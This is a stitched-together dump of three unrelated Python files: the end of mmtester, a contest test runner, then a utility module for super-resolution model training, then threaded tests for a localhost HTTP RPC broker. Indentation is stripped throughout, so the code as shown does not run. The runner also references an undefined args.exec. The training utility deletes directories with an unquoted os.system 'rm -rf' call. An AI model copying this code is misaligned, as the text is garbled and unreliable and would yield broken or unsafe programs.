tests = tests_used[0].intersection(*tests_used[1:])
else:
        # TODO: error check if tests are contained in the intersection of all results files?
pass
if not tests:
fatal_error('There are no common tests within the results files (maybe one of the results files is empty?)')
if not data and (filters or groups):
fatal_error('Filters/Groups used but no data file is provided')
if filters:
initial_tests_no = len(tests)
for filter in filters:
tests = apply_filter(tests, data, filter)
print(f'Filtered {initial_tests_no} tests to {len(tests)}')
group_names = []
group_tests = []
group_names.append('Score')
group_tests.append(tests)
if groups:
for group in groups:
if '=' in group:
group_names.append(group)
group_tests.append(apply_filter(tests, data, group))
elif '@' in group:
var, bins = group.split('@')
bins = int(bins)
values = sorted([data[test][var] for test in tests])
# XXX: probably there's a better way to split values into bins
pos_start = 0
for bin in range(bins):
pos_end = (bin+1) * len(tests) // bins
while pos_end < len(tests) and values[pos_end] == values[pos_end-1]: pos_end += 1
if pos_end <= pos_start:
continue
group_name = f'{var}={values[pos_start]}-{values[pos_end-1]}'
group_names.append(group_name)
group_tests.append(apply_filter(tests, data, group_name))
pos_start = pos_end
else:
var = group
var_set = sorted(set([data[test][var] for test in tests]))
for value in var_set:
group_names.append(f'{var}={value}')
group_tests.append(apply_filter(tests, data, f'{var}={value}'))
headers = ['Tests\nRun'] + [f'{len(tests)}\n{name}' for name, tests in zip(group_names, group_tests)]
table = [[run_name] for run_name in runs]
total_fails = {run_name: 0 for run_name in runs}
total_bests = {run_name: 0 for run_name in runs}
total_uniques = {run_name: 0 for run_name in runs}
total_gain = {run_name: 0 for run_name in runs}
for group_no, group_test in enumerate(group_tests):
total_scores = {run_name: 0.0 for run_name in runs}
group_scale = args.scale / max(1, len(group_test)) if args.scale else 1.0
for test in group_test:
scores = process_raw_scores([run_results[test]['score'] for run_results in runs.values()], args.scoring)
best_score = max(scores)
second_best_score = sorted(scores)[-2] if len(scores) > 1 else 0
unique_best = len([score for score in scores if score == best_score]) == 1
for run_name, score in zip(runs.keys(), scores):
total_scores[run_name] += score
if group_no == 0:
total_bests[run_name] += 1 if score == best_score else 0
total_uniques[run_name] += 1 if score == best_score and unique_best else 0
total_gain[run_name] += max(0, score - second_best_score) * group_scale
total_fails[run_name] += 1 if score <= 0 else 0
for i, run_name in enumerate(runs):
table[i].append(total_scores[run_name] * group_scale)
if cfg['general']['show_bests'].lower() == 'true':
headers.append('\nBests')
for i, run_name in enumerate(runs):
table[i].append(total_bests[run_name])
if cfg['general']['show_uniques'].lower() == 'true':
headers.append('\nUniques')
for i, run_name in enumerate(runs):
table[i].append(total_uniques[run_name])
if cfg['general']['show_gain'].lower() == 'true':
headers.append('\nGain')
for i, run_name in enumerate(runs):
table[i].append(total_gain[run_name])
if cfg['general']['autohide_fails'].lower() == 'false' or max(total_fails.values()) > 0:
headers.append('\nFails')
for i, run_name in enumerate(runs):
table[i].append(total_fails[run_name])
if hasattr(tabulate, 'MIN_PADDING'):
tabulate.MIN_PADDING = 0
print(tabulate.tabulate(table, headers=headers, floatfmt=f'.{cfg["general"]["precision"]}f'))
def _main():
global args
global cfg
parser = argparse.ArgumentParser(description='Local tester for Topcoder Marathons & AtCoder Heuristic Contests\nMore help available at https://github.com/FakePsyho/mmtester')
parser.add_argument('name', type=str, nargs='?', default=None, help='name of the run')
parser.add_argument('-c', '--config', type=str, default=DEFAULT_CONFIG_PATH, help='path to cfg file')
parser.add_argument('-t', '--tests', type=str, help='number of tests to run, range of seeds (e.g. A-B) or the name of the JSON/text file with the list of seeds')
parser.add_argument('-m', '--threads_no', type=int, help='number of threads to use')
parser.add_argument('-p', '--progress', action='store_true', help='shows current progress when testing')
parser.add_argument('-a', '--tester_arguments', type=str, default='', help='additional arguments for the tester')
parser.add_argument('-b', '--benchmark', type=str, default=None, help='benchmark res file to test against')
parser.add_argument('-s', '--show', action='store_true', help='shows current results')
parser.add_argument('--config-load', type=str, help='creates a new config based on specified template config')
parser.add_argument('--config-save', type=str, help='updates a template config with local config')
parser.add_argument('--config-delete', type=str, help='permanently deletes stored template config')
parser.add_argument('--config-list', action='store_true', help='lists available template configs')
parser.add_argument('--data', type=str, default=None, help='file with metadata, used for grouping and filtering; in order to always use latest results file set it to LATEST')
parser.add_argument('--filters', type=str, default=None, nargs='+', help='filters results based on criteria')
parser.add_argument('--groups', type=str, default=None, nargs='+', help='groups results into different groups based on criteria')
parser.add_argument('--scale', type=float, help='sets scaling of results')
parser.add_argument('--scoring', type=str, default=None, help='sets the scoring function used for calculating ranking')
parser.add_argument('--sorting', type=str, default=None, choices=['name', 'date'], help='sets how the show runs are sorted')
    parser.add_argument('--find', type=str, default=None, nargs='+', help='usage: --find res_file var[+/-] [limit]; sorts tests by var (ascending / descending) and prints seeds; can be combined with --filters; you can use LATEST for res_file')
parser.add_argument('--generate-scripts', action='store_true', help='generates scripts defined in the config file')
parser.add_argument('--ip', type=str, default=None, help='optional argument for --generate-scripts')
parser.add_argument('--source', type=str, default=None, help='optional argument for --generate-scripts')
args = parser.parse_args()
if args.config_load:
args.config_load += '.cfg'
template_config = os.path.join(os.path.dirname(__file__), args.config_load)
if not os.path.exists(template_config):
fatal_error(f'Missing {args.config_load} template config file')
if os.path.exists(args.config):
fatal_error(f'Config file {args.config} already exists')
print(f'Creating new config file at {args.config}')
shutil.copy(template_config, os.path.join(os.getcwd(), args.config))
sys.exit(0)
if args.config_save:
args.config_save += '.cfg'
template_config = os.path.join(os.path.dirname(__file__), args.config_save)
assert os.path.exists(args.config)
print(f'Updating {args.config_save} template config with {args.config}')
# if os.path.exists(template_config):
# print('Template config file {args.config_save} already exists, do you wish to overwrite it?')
shutil.copy(os.path.join(os.getcwd(), args.config), template_config)
sys.exit(0)
if args.config_delete:
args.config_delete += '.cfg'
template_config = os.path.join(os.path.dirname(__file__), args.config_delete)
if not os.path.exists(template_config):
fatal_error(f'Missing {args.config_delete} template config file')
print(f'Removing template config file {args.config_delete}')
os.remove(template_config)
sys.exit(0)
if args.config_list:
template_configs = glob.glob(f'{os.path.dirname(__file__)}/*.cfg')
table = []
for template_config in template_configs:
cfg = configparser.ConfigParser()
cfg.read(template_config)
table += [[os.path.splitext(os.path.basename(template_config))[0], cfg['general']['description']]]
print('Available template config files:')
print(tabulate.tabulate(table, headers=['name', 'description']))
sys.exit(0)
if not os.path.exists(args.config):
fatal_error([f"Missing config file {args.config}, either use correct config file with \"mmtester -c config_file\" or create a new config file with \"mmtester --config-load config_template\"",
"If you don't know how to use mmtester, please check out the github project readme at: https://github.com/FakePsyho/mmtester"])
cfg = configparser.ConfigParser(interpolation=None)
cfg.read(args.config)
if cfg['general']['version'] != __version__:
fatal_error([f"{args.config} version ({cfg['general']['version']}) doesn't match the current version of mmtester {__version__}",
"Unfortunately mmtester is currently not backwards compatible with old config files",
"The easiest way to resolve the problem is to manually update your config file with changes introduced in the new version (create a new config file with --new-config)",
"Alternatively, you can downgrade your version of mmtester to match the config file"])
# XXX: probably there's a better way to do this
def convert(value, type=str):
if value is None or value == '':
return None
if type == bool:
return value.lower() in ['true', 'yes']
return type(value)
args.tests = try_str_to_numeric(args.tests or convert(cfg['default']['tests']))
args.threads_no = args.threads_no or convert(cfg['default']['threads_no'], int)
args.progress = args.progress or convert(cfg['default']['progress'], bool)
args.benchmark = args.benchmark or convert(cfg['default']['benchmark'])
args.tester_arguments = args.tester_arguments or cfg['default']['tester_arguments']
args.data = args.data or cfg['default']['data']
args.scale = args.scale or convert(cfg['default']['scale'], float)
args.scoring = args.scoring or convert(cfg['default']['scoring'])
args.sorting = args.sorting or convert(cfg['default']['sorting'])
# Mode: Generate Scripts
if args.generate_scripts:
        print('Functionality temporarily disabled')
sys.exit(0)
print('Generating Scripts')
for script_name in cfg['scripts']:
script = cfg.get('scripts', script_name, raw=True)
undefined = []
if '%RUN_CMD%' in script:
script = script.replace('%RUN_CMD%', cfg['general']['run_cmd'])
if '%EXEC%' in script:
if not args.exec:
                    undefined.append('missing %EXEC% (use --exec EXEC)')
else:
script = script.replace('%EXEC%', args.exec)
if '%IP%' in script:
if not args.ip:
undefined.append('missing %IP% (use --ip IP)')
else:
script = script.replace('%IP%', args.ip)
if '%SOURCE%' in script:
if not args.source:
undefined.append('missing %SOURCE% (use --source SOURCE)')
else:
script = script.replace('%SOURCE%', args.source)
if undefined:
print(f'Ignoring script {script_name} because of {undefined}')
continue
with open(script_name, 'w') as f:
for i, line in enumerate(script.split('\\n')):
prefix = f'{script_name} ='
print(prefix if i == 0 else ' ' * len(prefix), line)
print(line, file=f)
sys.exit(0)
# Mode: Find
if args.find:
assert len(args.find) in [2, 3]
assert args.find[1][-1] in ['-', '+']
if args.find[0] == 'LATEST':
results_files = find_res_files(cfg['general']['results_dir'])
_, args.find[0] = sorted(zip([os.path.getmtime(result_file) for result_file in results_files], results_files))[-1]
else:
args.find[0] += cfg['general']['results_ext']
results = load_res_file(args.find[0])
tests = results.keys()
for filter in args.filters or []:
tests = apply_filter(tests, results, filter)
var = args.find[1][:-1]
ascending = args.find[1][-1] == '+'
ordered_tests = [test for _, test in sorted(zip([results[test][var] for test in tests], tests), reverse=not ascending)]
if len(args.find) == 3:
ordered_tests = ordered_tests[:int(args.find[2])]
print(f'Finding in {args.find[0]} file')
for test in ordered_tests:
print(json.dumps(results[test]))
sys.exit(0)
# Parse args.tests
if args.tests is None:
pass
elif isinstance(args.tests, int):
args.tests = list(range(1, args.tests + 1))
elif re.search('[a-zA-Z]', args.tests):
if not os.path.exists(args.tests):
fatal_error(f'Cannot locate {args.tests} file')
with open(args.tests) as f:
lines = f.read().splitlines()
assert len(lines) > 0
if isinstance(try_str_to_numeric(lines[0]), int):
args.tests = [int(line) for line in lines]
else:
args.tests = [json.loads(line)['id'] for line in lines]
else:
assert '-' in args.tests
lo, hi = args.tests.split('-')
lo = try_str_to_numeric(lo)
hi = try_str_to_numeric(hi)
args.tests = list(range(lo, hi + 1))
# Mode: Summary
if args.show:
results_files = find_res_files(cfg['general']['results_dir'])
if not results_files:
fatal_error(f'There are no results files in the results folder: {cfg["general"]["results_dir"]}')
if args.sorting == 'name':
results_files = sorted(results_files)
elif args.sorting == 'date':
results_files = [result_file for _, result_file in sorted(zip([os.path.getmtime(result_file) for result_file in results_files], results_files))]
results = {os.path.basename(file).split('.')[0]: load_res_file(file) for file in results_files}
if args.data == 'LATEST':
_, args.data = sorted(zip([os.path.getmtime(result_file) for result_file in results_files], results_files))[-1]
data_file = load_res_file(args.data) if args.data and os.path.isfile(args.data) else None
show_summary(results, tests=args.tests, data=data_file, groups=args.groups, filters=args.filters)
sys.exit(0)
# Mode: Run tests
if not os.path.exists(cfg['general']['tests_dir']):
os.mkdir(cfg['general']['tests_dir'])
if not args.tests:
fatal_error('You need to specify tests to run, use --tests option')
assert args.threads_no >= 1
fout = sys.stdout
if args.name:
os.makedirs(cfg["general"]["results_dir"], exist_ok=True)
fout = open(f'{cfg["general"]["results_dir"]}/{args.name}{cfg["general"]["results_ext"]}', 'w')
inputs_path = {}
if cfg["general"]["cmd_generator"]:
# generate input files
print('Generating test cases...', file=sys.stderr)
gen_seeds = []
if cfg['general']['generator_cache'].lower() == 'true':
os.makedirs('inputs', exist_ok=True)
inputs_path = {seed: f'inputs/{seed}.in' for seed in args.tests}
present_inputs = set([path for path in os.listdir('inputs') if os.path.isfile(f'inputs/{path}')])
gen_seeds = [seed for seed in args.tests if f'{seed}.in' not in present_inputs]
else:
inputs_path = {seed: f'in/{i:04d}.txt' for i, seed in enumerate(args.tests)}
gen_seeds = args.tests
if gen_seeds:
seeds_path = 'mmtester_seeds.txt'
with open(seeds_path, 'w') as f:
f.write('\n'.join([str(seed) for seed in gen_seeds]))
subprocess.run(f'{cfg["general"]["cmd_generator"]} {seeds_path}', shell=True)
if cfg['general']['generator_cache'].lower() == 'true':
for i, seed in enumerate(gen_seeds):
shutil.copy(f'in/{i:04d}.txt', f'inputs/{seed}.in')
#TODO: add error handling/warning for benchmark file (file not existing, no full test coverage)
benchmark = load_res_file(args.benchmark + cfg['general']['results_ext']) if args.benchmark else None
try:
start_time = time.time()
for id in args.tests:
tests_queue.put({'seed': id, 'path': inputs_path.get(id, None)})
tests_left = args.tests
def worker_loop():
while True:
try:
seed = tests_queue.get(False)
result = run_test(seed)
results_queue.put(result)
except queue.Empty:
return
except:
traceback.print_exc()
                    fatal_error('One of the worker threads encountered an error', exit_main=True)
workers = [Thread(target=worker_loop) for _ in range(args.threads_no)]
for worker in workers:
worker.start()
sum_scores = 0
log_scores = 0
benchmark_log_scores = 0
results = {}
processed = 0
while tests_left:
result = results_queue.get()
results[result['id']] = result
assert result['id'] in tests_left
while tests_left and tests_left[0] in results:
processed += 1
seed = tests_left[0]
print(json.dumps(results[seed]), file=fout, flush=True)
tests_left = tests_left[1:]
sum_scores += results[seed]['score'] if results[seed]['score'] > 0 else 0
log_scores += math.log(results[seed]['score']) if results[seed]['score'] > 0 else 0
if args.progress and args.name:
output = f'Progress: {processed} / {processed+len(tests_left)} Time: {time.time() - start_time : .3f}'
if args.benchmark:
                        benchmark_log_scores += math.log(benchmark[seed]['score']) if benchmark[seed]['score'] > 0 else 0
output += f' Scores: {log_scores / processed : .6f} vs {benchmark_log_scores / processed : .6f}'
print(f'\r{output} ', end='', file=sys.stderr)
sys.stderr.flush()
time.sleep(0.001)
except KeyboardInterrupt:
print('\nInterrupted by user', file=sys.stderr)
os._exit(1)
print(file=sys.stderr)
print("Time:", time.time() - start_time, file=sys.stderr)
print("Avg Score:", sum_scores / len(results), file=sys.stderr)
print("Avg Log Scores:", log_scores / len(results), file=sys.stderr)
if __name__ == '__main__':
_main()
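# Hedged usage sketch (run names and counts are placeholders; the flags come from the
# argument parser above):
#   mmtester baseline --tests 100 -m 8 --progress      # run 100 seeds on 8 threads
#   mmtester improved --tests 100 -m 8 -b baseline     # compare against a benchmark run
#   mmtester --show --scoring min --groups N           # scoreboard grouped by data key N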
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
"""start the timer"""
self.t0 = time.time()
def toc(self, restart=False):
"""
get the time interval
:param restart: if True, restart the timer
:return:
"""
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
"""accumulate the time interval"""
self.acc += self.toc()
def release(self):
"""get the accumulation of time interval"""
ret = self.acc
self.acc = 0
return ret
def reset(self):
"""reset the accumulation"""
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
print("args.load=", args.load)
print("args.save=", args.save)
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
print(self.dir, os.path.exists(self.dir), args.load)
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
        open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
label = 'SR on {}'.format(self.args.data_test[0])
fig = plt.figure()
plt.title(label)
plt.plot(
axis,
self.log[:].numpy(),
label='Scale {}'.format(self.args.scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(self.args.data_test[0])))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
if self.args.results_dir == "":
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
filename
)
else:
filename = os.path.join(self.args.results_dir, filename)
postfix = ('_h_Res', '_l', '_h_GT')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}.bmp'.format(filename.replace('_l', p)), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
# milestones = list(map(lambda x: int(x), args.decay.split('-')))
# kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
# scheduler_class = lrs.MultiStepLR
kwargs_scheduler = {
'mode': "max",
'verbose': True,
'factor': args.ms_factor,
'patience': args.ms_patience,
'threshold': 1e-4,
'threshold_mode': 'rel',
'cooldown': 0,
'min_lr': 1e-8,
'eps': 1e-6
}
scheduler_class = optim.lr_scheduler.ReduceLROnPlateau
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir), args.cuda))
self.scheduler.last_epoch = epoch - 1
# if epoch > 1:
# for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self, loss):
self.scheduler.step(loss)
def get_lr(self):
return self.state_dict().get('param_groups')[0].get('lr')
def get_last_epoch(self):
return self.scheduler.last_epoch + 1
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
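# Hedged usage sketch (not part of the original file): how the CustomOptimizer
# returned by make_optimizer() might be driven in a training loop. `args`,
# `model`, `loss_fn`, the loaders and evaluate() are assumed to exist
# elsewhere. Note the scheduler is ReduceLROnPlateau with mode="max", so
# schedule() expects a metric to maximise (e.g. validation PSNR), not a loss.
#
#     optimizer = make_optimizer(args, model)
#     for epoch in range(args.epochs):
#         for lr_img, hr_img in train_loader:
#             optimizer.zero_grad()
#             loss_fn(model(lr_img), hr_img).backward()
#             optimizer.step()
#         val_psnr = evaluate(model, val_loader)   # hypothetical helper
#         optimizer.schedule(val_psnr)             # steps ReduceLROnPlateau
#         print(epoch, optimizer.get_lr())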
|
main4.py
|
import time
import threading
import requests
L = 'http://localhost:8001'
TIMEOUT = 5
def make_request(method):
method = getattr(requests, method)
def req(path, *a, type=None, headers=None, **kw):
if 'timeout' not in kw:
kw['timeout'] = TIMEOUT
if type:
if not headers:
headers = {}
headers['Type'] = type
return method(L + path, *a, headers=headers, **kw)
return req
post = make_request('post')
get = make_request('get')
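# Hedged note (not part of the original file): post() and get() are thin
# wrappers around requests.post/requests.get that prepend the base URL L,
# apply the default TIMEOUT, and turn type='x' into a 'Type: x' header, e.g.
#
#     post('/test/cmd1', json={'id': 1}, type='create')
#
# sends POST http://localhost:8001/test/cmd1 with the header 'Type: create'.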
def mem(links):
if not isinstance(links, list):
links = [links]
def get_memory():
return int(get('/debug').text.split(': ')[1])
def inner(fn):
def wrapper():
for link in links:
post(link, type='create')
post(link, type='delete')
time.sleep(0.6)
mem = get_memory()
fn()
for link in links:
post(link, type='delete')
time.sleep(0.6)
assert mem == get_memory()
return wrapper
return inner
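# Hedged note (not part of the original file): @mem(links) is a leak-check
# fixture for the tests below. Before the wrapped test it creates and deletes
# each link once to warm the server up, records the memory counter reported by
# /debug, runs the test, deletes the links again, and finally asserts that the
# counter returned to its pre-test value.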
@mem('/test/cmd1')
def test_default():
clients = [None, None]
def _request(i):
time.sleep(0.1 * i)
clients[i - 1] = post('/test/cmd1', json={'id': i, 'params': 'ubuntu'})
threading.Thread(target=_request, args=(1,)).start()
threading.Thread(target=_request, args=(2,)).start()
worker = get('/test/cmd1', type='get')
assert worker.status_code == 200
request = worker.json()
assert request['id'] == 1
assert request['params'] == 'ubuntu'
assert post('/rpc/result', json={'id': 1, 'result': 'linux'}).status_code == 200
time.sleep(0.1)
assert clients[0].status_code == 200
response = clients[0].json()
assert response['id'] == 1
assert response['result'] == 'linux'
assert clients[1] is None
worker = get('/test/cmd1', type='get')
assert worker.status_code == 200
request = worker.json()
assert request['id'] == 2
assert request['params'] == 'ubuntu'
assert post('/rpc/result', json={'id': 2, 'result': 'unix'}).status_code == 200
time.sleep(0.1)
assert clients[1].status_code == 200
response = clients[1].json()
assert response['id'] == 2
assert response['result'] == 'unix'
@mem('/one')
def test_request_without_id():
def run_worker():
r = get('/one', type='get')
post('/' + r.headers['id'], json={'result': 'ok'}, type='result')
threading.Thread(target=run_worker).start()
time.sleep(0.1)
r = post('/one', json={'params': 1})
assert r.status_code == 200
assert r.json()['result'] == 'ok'
@mem('/test/worker')
def test_worker_mode():
def worker():
s = requests.Session()
task = s.post(L + '/test/worker', json={'info': 'test for worker mode'}, headers={'Type': 'worker'}).json()
while True:
time.sleep(0.1)
if task.get('stop'):
break
task = s.post(L, json={'result': sum(task['nums'])}).json()
threading.Thread(target=worker).start()
time.sleep(0.1)
result = post('/test/worker', json={'nums': [1]}).json()
assert result['result'] == 1
result = post('/test/worker', json={'nums': [1, 3, 5]}).json()
assert result['result'] == 9
result = post('/test/worker', json={'nums': [7, 11, 13, 17]}).json()
assert result['result'] == 48
r = post('/test/worker', json={'stop': True})
assert r.status_code == 503
r = post('/rpc/details').json()
assert r['test/worker']['info'] == 'test for worker mode'
@mem(['/pattern/*', '/task/revert'])
def test_pattern():
h_response = None
def worker():
nonlocal h_response
s = requests.Session()
r = s.get(L + '/pattern/*', headers={'Type': 'worker'})
while True:
name = r.headers['name'][8:]
time.sleep(0.1)
if not name:
r = s.post(L, data=b'sum,mul,stop')
continue
if name == 'sum':
task = r.json()
response = {'result': sum(task['value'])}
elif name == 'mul':
task = r.json()
response = {'result': task['value'][0] * task['value'][1]}
elif name == 'stop':
r = s.post(L, json={'result': 'ok'}, headers={'Option': 'stop'})
break
else:
response = {'error': 'no method'}
r = s.post(L, json=response)
time.sleep(0.2)
h_response = s.post('http://localhost:8001/task/revert', json={'id': 12345}).json()
threading.Thread(target=worker).start()
time.sleep(0.1)
assert get('/pattern/').text == 'sum,mul,stop'
r = post('/pattern/sum', json={'value': [1, 2, 3, 4]})
assert r.json()['result'] == 10
r = post('/pattern/mul', json={'value': [3, 5]})
assert r.json()['result'] == 15
r = post('/pattern/typo', json={'value': [3, 5]})
assert r.json()['error'] == 'no method'
r = post('/pattern/stop')
assert r.status_code == 200
assert r.json()['result'] == 'ok'
error = None
try:
get('/pattern/', timeout=0.1)
except Exception as e:
error = e
assert isinstance(error, requests.exceptions.ReadTimeout)
task = get('/task/revert', type='get').json()
assert task['id'] == 12345
post('/12345', json={'result': 'ok'}, type='result')
time.sleep(0.1)
assert h_response['result'] == 'ok'
@mem('/test4/*')
def test4():
h_response = None
def worker():
nonlocal h_response
s = requests.Session()
s.get(L + '/test4/*', headers={'Type': 'worker'})
s.post(L, data=b'sum,mul,stop')
threading.Thread(target=worker).start()
time.sleep(0.1)
assert get('/test4/').text == 'sum,mul,stop'
r = post('/test4/sum', json={'value': [1, 2, 3, 4]})
assert r.status_code == 503
def run(delay):
    # Decorator: run the wrapped function once in a background thread,
    # optionally after `delay` seconds. The original function is returned
    # unchanged so the decorated name stays callable.
    def wrapper(fn):
        def wr():
            if delay:
                time.sleep(delay)
            fn()
        th = threading.Thread(target=wr)
        th.start()
        return fn
    return wrapper
@mem('/test6')
def test6_priority():
result = []
@run(0)
def worker():
worker = requests.Session()
task = worker.post(L + '/test6', headers={'Type': 'get+'}).json()
worker.post(L, json={'result': task['request']}, headers={'X-Type': 'result'}, timeout=TIMEOUT)
time.sleep(0.1)
response = post('/test6', json={'request': 0}).json()
result.append(response['result'])
def request(delay, value, priority=0):
@run(delay)
def send():
headers = {}
if priority:
headers['Priority'] = str(priority)
response = post('/test6', json={'request': value}, headers=headers).json()
result.append(response['result'])
request(0.1, 1)
request(0.2, 2, 5)
request(0.3, 3, -5)
request(0.4, 4, 3)
request(0.5, 5, -3)
request(0.6, 6, 1)
request(0.7, 7, -1)
request(0.8, 8)
request(0.9, 9, 4)
time.sleep(1.2)
details = post('/rpc/details').json()
assert details['test6']['clients'] == 9
worker = requests.Session()
for _ in range(9):
task = worker.post(L + '/test6', headers={'Type': 'get+'}, timeout=TIMEOUT).json()
worker.post(L, json={'result': task['request']}, headers={'Type': 'result'}, timeout=TIMEOUT)
time.sleep(0.05)
time.sleep(0.5)
assert result == [0, 2, 9, 4, 6, 1, 8, 7, 5, 3]
@mem('/test7/async')
def test7_async():
is_async = False
data = None
@run(0)
def first():
nonlocal is_async, data
r = post('/test7/async', headers={'Type': 'get'})
is_async = r.headers.get('Async') == 'true'
data = r.text
time.sleep(0.1)
r = post('/test7/async', headers={'Type': 'async'}, data='test7')
assert r.status_code == 200
time.sleep(0.1)
assert is_async
assert data == 'test7'
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 0
assert details['test7/async']['clients'] == 0
for i in range(10):
r = post('/test7/async', headers={'Type': 'async'}, data='test_' + str(i))
assert r.status_code == 200
time.sleep(0.01)
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 0
assert details['test7/async']['clients'] == 10
for i in range(10):
r = post('/test7/async', headers={'Type': 'get'})
assert r.headers.get('Async') == 'true'
assert r.text == 'test_' + str(i)
time.sleep(0.2)
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 0
assert details['test7/async']['clients'] == 0
for i in range(10):
time.sleep(i*0.02)
@run(0)
def worker():
r = post('/test7/async', headers={'Type': 'get'})
assert r.headers.get('Async') == 'true'
assert r.text == 'test_' + str(i)
time.sleep(0.1)
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 10
assert details['test7/async']['clients'] == 0
for i in range(10):
r = post('/test7/async', headers={'Type': 'async'}, data='test_' + str(i))
assert r.status_code == 200
time.sleep(0.01)
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 0
assert details['test7/async']['clients'] == 0
@mem('/test7/async2')
def test7_async_worker():
result = 0
count = 0
check = None
@run(0)
def worker():
nonlocal result, count, check
s = requests.Session()
r = s.get(L + '/test7/async2', headers={'Type': 'worker'})
while True:
assert r.status_code == 200
if r.content == b'stop':
r = s.post(L, headers={'Option': 'stop'})
assert r.status_code == 200
break
#assert r.headers.get('Async') == 'true'
result += r.json()['data']
if result == 0:
time.sleep(0.5)
check = post('/rpc/details').json()
count += 1
r = s.get(L)
result += 1000
time.sleep(0.1)
s = requests.Session()
for i in range(15):
if i == 7:
time.sleep(1)
check2 = post('/rpc/details').json()
r = s.post(L + '/test7/async2', json={'data': i}, headers={'Type': 'async'})
assert r.status_code == 200
s.post(L + '/test7/async2', data=b'stop')
time.sleep(0.2)
check3 = post('/rpc/details').json()
assert count == 15
assert result == 1105
assert check['test7/async2']['clients'] == 6
assert check['test7/async2']['workers'] == 0
assert check2['test7/async2']['clients'] == 0
assert check2['test7/async2']['workers'] == 1
assert check3['test7/async2']['clients'] == 0
assert check3['test7/async2']['workers'] == 0
@mem('/test8')
def test8_worker_id():
def go(sleep, name, id=None):
@run(sleep)
def worker():
s = requests.Session()
headers = {'Type': 'get+'}
if id:
headers['Set-ID'] = str(id)
r = s.get(L + '/test8', headers=headers)
s.post(L, json={'name': name}, headers={'Type': 'result'})
go(0, 'linux')
